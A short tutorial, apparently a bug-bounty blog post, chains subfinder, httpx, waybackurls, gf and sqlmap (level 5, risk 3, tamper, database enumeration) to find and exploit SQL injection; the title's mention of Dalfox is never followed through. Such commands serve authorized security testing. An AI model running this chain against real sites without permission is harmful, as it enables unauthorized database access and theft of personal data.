Automating SQL Injection using Dalfox, GF and Waybackurls

SQL injection attacks are attacks that occur on the web by utilizing malicious code that is inserted into input permitted by the web application, then executed by the server.

Impact of SQL Injection attacks

1. Financial losses from handling security incidents.
2. Damaging the company’s reputation.
3. Loss of consumer trust.
4. Data leaks occur, such as personal data or sensitive company data.
5. It is possible that the perpetrator took over the user’s account.

There are several methods that you can do, in this I will explain using the Dalfox, GF and Waybackurls tools.

subfinder -d example.com | tee -a domains.txt
cat domains.txt | httpx | tee urls.alive 
cat urls.alive | waybackurls | tee wayback.urls

Then search for SQL injection using wayback.urls.

gf sqli wayback.urls >> urls.sqli

The next step we will use sqlmap to search for sql injection bugs.

sqlmap -m urls.sqli --level 5 --risk 3 --batch --dbs --tamper=between

Hmm looks like it’s done